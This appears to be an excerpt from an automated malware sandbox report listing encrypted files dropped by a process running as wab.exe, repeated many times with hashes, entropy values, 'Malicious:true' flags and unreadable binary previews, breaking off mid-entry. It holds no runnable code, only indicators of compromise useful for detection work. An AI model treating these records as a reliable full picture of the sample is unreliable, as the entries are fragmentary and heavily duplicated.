                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185754
                                                                                          Entropy (8bit):7.998925872331646
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR22G6PL:YzytbGOX6A16mtpmGvFdVT6LELSRxP99
                                                                                          MD5:A1755C600F4AB8E0ED11E4BE261B259B
                                                                                          SHA1:F98A607D2EE3419123EC8834B04759EF736ADE8B
                                                                                          SHA-256:2CC4011A58DA40A8C9C8D480AA4E77FD131D9EE8DEAFD145FD1FB19135F4B776
                                                                                          SHA-512:8211D909FEC9D6EE02A8CE6F14B12B1A76B21FB64940EFA0E071AC538BF9FF840EE6F8047F67386DFD560985C1330F841AD4466F278A4F801524E2FBF1648DD3
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185526
                                                                                          Entropy (8bit):7.998992370994253
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxM:YzytbGOX6A16mtpmGvFdVT6LELSRDqcM
                                                                                          MD5:166EFAA99A67A659BD8E78C45B543235
                                                                                          SHA1:7C20D445270D78BA8BA30DBF542AB25ADB987B83
                                                                                          SHA-256:32363758888BC95073F99516D02E1AEE55A09E3261AD060B2688681DEEF1CADA
                                                                                          SHA-512:88BC12E71A149777CB06F101C931E1BE27191F4A1DE9689171F896E4E0013E54189909434918808744E14CA8C4DF89F645014604B698056EBEA8715B45BD3125
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185526
                                                                                          Entropy (8bit):7.998992370994253
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxM:YzytbGOX6A16mtpmGvFdVT6LELSRDqcM
                                                                                          MD5:166EFAA99A67A659BD8E78C45B543235
                                                                                          SHA1:7C20D445270D78BA8BA30DBF542AB25ADB987B83
                                                                                          SHA-256:32363758888BC95073F99516D02E1AEE55A09E3261AD060B2688681DEEF1CADA
                                                                                          SHA-512:88BC12E71A149777CB06F101C931E1BE27191F4A1DE9689171F896E4E0013E54189909434918808744E14CA8C4DF89F645014604B698056EBEA8715B45BD3125
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185526
                                                                                          Entropy (8bit):7.998992370994253
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxM:YzytbGOX6A16mtpmGvFdVT6LELSRDqcM
                                                                                          MD5:166EFAA99A67A659BD8E78C45B543235
                                                                                          SHA1:7C20D445270D78BA8BA30DBF542AB25ADB987B83
                                                                                          SHA-256:32363758888BC95073F99516D02E1AEE55A09E3261AD060B2688681DEEF1CADA
                                                                                          SHA-512:88BC12E71A149777CB06F101C931E1BE27191F4A1DE9689171F896E4E0013E54189909434918808744E14CA8C4DF89F645014604B698056EBEA8715B45BD3125
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185526
                                                                                          Entropy (8bit):7.998992370994253
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxM:YzytbGOX6A16mtpmGvFdVT6LELSRDqcM
                                                                                          MD5:166EFAA99A67A659BD8E78C45B543235
                                                                                          SHA1:7C20D445270D78BA8BA30DBF542AB25ADB987B83
                                                                                          SHA-256:32363758888BC95073F99516D02E1AEE55A09E3261AD060B2688681DEEF1CADA
                                                                                          SHA-512:88BC12E71A149777CB06F101C931E1BE27191F4A1DE9689171F896E4E0013E54189909434918808744E14CA8C4DF89F645014604B698056EBEA8715B45BD3125
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185526
                                                                                          Entropy (8bit):7.998992370994253
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxM:YzytbGOX6A16mtpmGvFdVT6LELSRDqcM
                                                                                          MD5:166EFAA99A67A659BD8E78C45B543235
                                                                                          SHA1:7C20D445270D78BA8BA30DBF542AB25ADB987B83
                                                                                          SHA-256:32363758888BC95073F99516D02E1AEE55A09E3261AD060B2688681DEEF1CADA
